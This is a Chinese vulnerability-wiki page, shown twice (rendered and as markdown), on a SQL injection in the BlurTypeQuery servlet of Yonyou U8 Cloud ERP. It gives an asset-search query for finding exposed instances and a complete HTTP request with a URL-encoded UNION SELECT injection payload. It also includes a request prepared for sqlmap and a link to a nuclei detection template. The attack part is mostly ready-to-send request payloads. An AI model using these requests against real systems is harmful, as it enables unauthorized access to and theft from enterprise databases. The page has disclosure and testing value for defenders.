fofamini-wiki

登录白背景

源码

用友U8 Cloud BlurTypeQuery 存在SQL注入

一、漏洞简介

用友U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。然而，该平台中存在一个安全漏洞，涉及BlurTypeQuery接口对用户输入参数缺乏有效过滤，可能导致SQL注入攻击。攻击者可通过此漏洞未经授权地访问数据库，造成潜在的信息泄露风险。建议尽快修复漏洞，强化输入验证，提升系统安全性。

二、影响版本

用友U8 Cloud

三、资产测绘

hunterapp.name="用友 U8 Cloud"

登录页面

四、漏洞复现

GET /servlet/~iufo/nc.itf.iufo.mobilereport.data.BlurTypeQuery?queryKey=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28118%29%2BCHAR%28113%29%2BISNULL%28CAST%28111%2A111%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL--%20HoaZ HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=42951667C70BD37103E4A706BB56ED41.server
Upgrade-Insecure-Requests: 1

sqlmap

GET /servlet/~iufo/nc.itf.iufo.mobilereport.data.BlurTypeQuery?queryKey=1 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=42951667C70BD37103E4A706BB56ED41.server
Upgrade-Insecure-Requests: 1

nuclei脚本
用友-U8C-Cloud-BlurTypeQuery-sql注入.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/sp098uguvcldsg9e

# 用友U8 Cloud BlurTypeQuery 存在SQL注入

# 一、漏洞简介
  用友U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。然而，该平台中存在一个安全漏洞，涉及BlurTypeQuery接口对用户输入参数缺乏有效过滤，可能导致SQL注入攻击。攻击者可通过此漏洞未经授权地访问数据库，造成潜在的信息泄露风险。建议尽快修复漏洞，强化输入验证，提升系统安全性。

# 二、影响版本

- 用友U8 Cloud

# 三、资产测绘

- hunter`app.name="用友 U8 Cloud"`

![image.png](./img/xhIon57cYS1kxGTs/1692444362525-121bbed1-c72d-4cad-99db-3e18509417c1-499872.png)

- 登录页面

![image.png](./img/xhIon57cYS1kxGTs/1692444381978-7d4ed5bf-a153-47e5-88e6-4dd97953e976-090329.png)

# 四、漏洞复现
```
GET /servlet/~iufo/nc.itf.iufo.mobilereport.data.BlurTypeQuery?queryKey=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28118%29%2BCHAR%28113%29%2BISNULL%28CAST%28111%2A111%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL--%20HoaZ HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=42951667C70BD37103E4A706BB56ED41.server
Upgrade-Insecure-Requests: 1
```
![image.png](./img/xhIon57cYS1kxGTs/1702570191473-fdeb4ba3-b32e-445f-872f-ec18ddd98d6b-935378.png)
sqlmap
```
GET /servlet/~iufo/nc.itf.iufo.mobilereport.data.BlurTypeQuery?queryKey=1 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=42951667C70BD37103E4A706BB56ED41.server
Upgrade-Insecure-Requests: 1
```
![image.png](./img/xhIon57cYS1kxGTs/1702570443123-8a55053b-4cf4-408c-a11f-2e420f705933-419712.png)
nuclei脚本
[用友-U8C-Cloud-BlurTypeQuery-sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219610171-3324c2fd-d3e6-4e81-887a-1bfbb5901469.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219610171-3324c2fd-d3e6-4e81-887a-1bfbb5901469.yaml%22%2C%22name%22%3A%22%E7%94%A8%E5%8F%8B-U8C-Cloud-BlurTypeQuery-sql%E6%B3%A8%E5%85%A5.yaml%22%2C%22size%22%3A1245%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u4a32febb-a1fc-47bc-95e2-9c09425b933%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u561229d0%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sp098uguvcldsg9e>